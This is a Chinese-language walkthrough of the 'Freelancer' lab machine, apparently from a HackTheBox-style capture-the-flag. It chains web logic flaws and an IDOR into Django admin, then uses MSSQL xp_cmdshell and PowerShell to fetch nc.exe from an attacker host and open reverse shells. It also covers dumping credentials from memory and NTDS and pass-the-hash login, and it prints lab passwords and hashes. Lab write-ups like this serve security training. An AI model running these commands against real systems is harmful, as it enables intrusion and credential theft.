基本信息
data:image/s3,"s3://crabby-images/fb74e/fb74e02ae8780d36aa7705b2431198f5a5222a91" alt=""
端口扫描
80和一些常规windows端口:
1 | nmap -sC -sV 10.10.11.5 |
80
需要加hosts:
1 | 10.10.11.5 freelancer.htb |
一个就活相关网站:
data:image/s3,"s3://crabby-images/5c5f6/5c5f6e4ad7ae47573b27ba99a9b8bcdef3f9f374" alt=""
目录扫描
目录扫描可以发现admin
1 | gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://freelancer.htb/ --exclude-length 197 |
Employer
页面上有两个注册入口,但Employer注册后是默认未激活状态:
data:image/s3,"s3://crabby-images/b49e4/b49e48fdaefa4fc9d1bf911869569f20b94c569d" alt=""
data:image/s3,"s3://crabby-images/471bc/471bc56c2f794e29c40a710d0e2792c0bed91981" alt=""
recovery
这里是处理逻辑上的错误,未激活的账号虽然不能登录,但可以选择忘记密码,输入注册时的安全问题答案后设置新密码,这时候账户被自动激活,可以正常登录:
data:image/s3,"s3://crabby-images/3514e/3514e0c016506f334e1698b108dd54e4697de0f8" alt=""
OTP QR-CODE
然后可以发现一个使用qr-code登录的功能:
data:image/s3,"s3://crabby-images/2ccf6/2ccf69114196aaa1b54d9a4399aef1683916bf3e" alt=""
分析qrcode内容,是这样的链接,中间一段base64看起来是用户id,后面是otp的md5:
1 | http://freelancer.htb/accounts/login/otp/MTAwMTM=/0268a3f41547b64009d5264a068b395c/ |
job
employer可以发布工作,测试发布,然后查看job信息可以看到employer信息查看接口,使用用户id:
data:image/s3,"s3://crabby-images/fdfdb/fdfdb8b7ada2bc508fc799a1281d551f67ce6b54" alt=""
data:image/s3,"s3://crabby-images/e5939/e59390714696e5c152186d325646606a3732ce80" alt=""
users
这个接口存在idor,枚举可以发现admin的id为2,以及其他一些用户:
1 | admin |
data:image/s3,"s3://crabby-images/c2175/c21750aace7f68cc72d972a268bcbe6524ea77ec" alt=""
admin
这里又是一个逻辑问题,OTP代码没和用户id绑定,直接修改中间用户id部分,访问到admin用户:
1 | http://freelancer.htb/accounts/login/otp/Mg==/239e3746d021264f38bdd160f52a419c/ |
data:image/s3,"s3://crabby-images/40140/40140910ffbc7809bd42a1140c110842a35df5b2" alt=""
现在我们可以访问admin,是django管理后台:
data:image/s3,"s3://crabby-images/8b05a/8b05ae161475cbf35cc8d95df2a32ee32473c4a9" alt=""
SQL Terminal
可以看到有一个SQL Terminal可以直接执行sql:
data:image/s3,"s3://crabby-images/18171/18171e09bc380a514db85b702a842c317762be09" alt=""
后面就是sql一步步枚举模拟,然后xp_cmdshell:
- 1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks | HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#execute-os-commands
1 | SELECT SYSTEM_USER; |
data:image/s3,"s3://crabby-images/88793/887933879d44020b2b857373cd27277cad7f187e" alt=""
data:image/s3,"s3://crabby-images/7922c/7922c7801e52c525a041eee302167ea2c9f5ae75" alt=""
sql_svc
然后就是执行命令获取shell,有杀软,简单的nc获取shell:
1 | powershell -exec bypass -c 'wget http://10.10.14.10:7777/nc.exe -O C:\windows\Tasks\nc.exe' |
data:image/s3,"s3://crabby-images/2cc68/2cc686386ec2078f59e7157d7974ee6eb0f2330b" alt=""
信息
然后在sql_svc的download目录中mssql相关目录,一个配置文件中得到一些密码:
1 | SQLSVCPASSWORD="IL0v3ErenY3ager" |
data:image/s3,"s3://crabby-images/5a8ea/5a8eaa2c958e1e32bbdb7eb7f4829a00c93ab74a" alt=""
mikasaAckerman & user flag
简单尝试可以发现mikasaAckerman用户复用了其中一个密码:
1 | .\RunasCs.exe mikasaAckerman IL0v3ErenY3ager -r 10.10.14.37:4444 powershell |
data:image/s3,"s3://crabby-images/3298e/3298e8ad10f2d92c8286a33f67e63fcfa55c14ee" alt=""
MEMORY.7z
mikasaAckerman桌面有个7z文件,根据邮件和7z文件名可以知道这是内存dump,那就下载到本地分析:
1 | ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao . -username miao -password miao |
解压之后就是内存dump,标准的volatility+mimikatz,或者windbg+mimikatz:
- volatilityfoundation/volatility: An advanced memory forensics framework
https://github.com/volatilityfoundation/volatility - Extracting passwords from hiberfil.sys and memory dumps – Diverto – Information Security Warriors
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps
1 | .load C:\mimikatz_trunk\x64\mimilib.dll |
data:image/s3,"s3://crabby-images/f3a8c/f3a8cc72d2192afcc96f132bf0306b7e335c9f47" alt=""
windbg+mimikatz有点问题,显示的不全,可以用MemProcFS加插件:
- ufrisk/MemProcFS: MemProcFS
https://github.com/ufrisk/MemProcFS - ufrisk/MemProcFS-plugins
https://github.com/ufrisk/MemProcFS-plugins
1 | .\MemProcFS.exe -device ..\MEMORY.DMP |
data:image/s3,"s3://crabby-images/db6b7/db6b739ed047a196430165b00b6ac6250ed33a3c" alt=""
dumps
从内存dump中提取出一些信息:
1 | Administrator acb3617b6b9da5dc7778092bdea6f3b8 v3ryS0l!dP@sswd#29 |
jmartinez path
根据内存中得到的密码规则,生成密码字典,枚举,发现jmartinez的密码,从这个用户开始有几种不同方式:
1 | v3ryS0l!dP@sswd#29 |
jmartinez在Account Operators组,可以直接操作其他账号
另外还有一种服务提权方式:
1 | sc.exe stop VMTools |
lorra199 path
另一个密码包含lorra199的变形,就是他的密码。登录lorra199:
1 | evil-winrm -u lorra199 -p 'PWN3D#l0rr@Armessa199' -i freelancer.htb |
data:image/s3,"s3://crabby-images/adda7/adda7636b587534a0d8e755cdffffb0a5ff9624b" alt=""
AD Recycle Bin
lorra199在AD Recycle Bin组中,很早之前的Cascade也出现过这部分:
- Active Directory Object Recovery using the Recycle Bin
https://blog.netwrix.com/2021/11/30/active-directory-object-recovery-recycle-bin/ - Restore-ADObject (ActiveDirectory) | Microsoft Learn
https://learn.microsoft.com/en-us/powershell/module/activedirectory/restore-adobject?view=windowsserver2022-ps
可以成功恢复liza.kazanof,然后使用前面内存中得到的密码切换过去:
1 | Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects |
data:image/s3,"s3://crabby-images/c8e11/c8e11ff5806cd5ce4250cabf5fc536284f38046a" alt=""
data:image/s3,"s3://crabby-images/b268a/b268aee416fca76837a9d8d0724fa3dfaa370135" alt=""
liza.kazanof
liza.kazanof有SeBackupPrivilege权限,直接卷影备份ntds和system然后dump即可:
data:image/s3,"s3://crabby-images/4aac9/4aac9e5a53c772c7d6948e30916f1ebd62d48888" alt=""
- k4sth4/SeBackupPrivilege: Windows Privilege Escalation
https://github.com/k4sth4/SeBackupPrivilege
就按照里面的步骤备份ntds和system,然后下载到本地dump:
data:image/s3,"s3://crabby-images/e5584/e55845cd6a1ef72e4b7c980c46e4f37d3c9c813d" alt=""
root flag
得到的Administrator hash登录:
1 | evil-winrm -u Administrator -H 0039318f1e8274633445bce32ad1a290 -i freelancer.htb |
data:image/s3,"s3://crabby-images/4985a/4985af057a33c60975d35045e0a5274c59343b0e" alt=""
hashdump
1 | ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -ntds ntds.dit -system system LOCAL |
参考资料
- 1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks | HackTricks
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#execute-os-commands - volatilityfoundation/volatility: An advanced memory forensics framework
https://github.com/volatilityfoundation/volatility - Extracting passwords from hiberfil.sys and memory dumps – Diverto – Information Security Warriors
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps - ufrisk/MemProcFS: MemProcFS
https://github.com/ufrisk/MemProcFS - ufrisk/MemProcFS-plugins
https://github.com/ufrisk/MemProcFS-plugins - Active Directory Object Recovery using the Recycle Bin
https://blog.netwrix.com/2021/11/30/active-directory-object-recovery-recycle-bin/ - Restore-ADObject (ActiveDirectory) | Microsoft Learn
https://learn.microsoft.com/en-us/powershell/module/activedirectory/restore-adobject?view=windowsserver2022-ps - k4sth4/SeBackupPrivilege: Windows Privilege Escalation
https://github.com/k4sth4/SeBackupPrivilege